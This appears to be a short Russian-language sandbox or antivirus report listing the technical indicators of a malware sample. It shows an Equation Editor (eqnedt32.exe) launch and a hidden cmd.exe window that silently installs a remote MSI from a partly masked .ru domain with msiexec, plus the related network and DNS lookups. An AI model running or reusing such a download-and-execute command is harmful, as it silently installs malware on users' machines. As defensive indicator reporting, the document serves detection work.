Техническая информация
- '%WINDIR%\syswow64\cmd.exe' & /C CD C: & msiexec.exe /i http://au###klad.ru/wp-includes/Requests/css/heny.msi /quiet
- 'au###klad.ru':80
- 'p-#r.ru':443
- http://au###klad.ru/wp-includes/Requests/css/heny.msi
- 'p-#r.ru':443
- DNS ASK au###klad.ru
- DNS ASK p-#r.ru
- '%WINDIR%\syswow64\cmd.exe' & /C CD C: & msiexec.exe /i http://au###klad.ru/wp-includes/Requests/css/heny.msi /quiet' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\msiexec.exe' /i http://au###klad.ru/wp-includes/Requests/css/heny.msi /quiet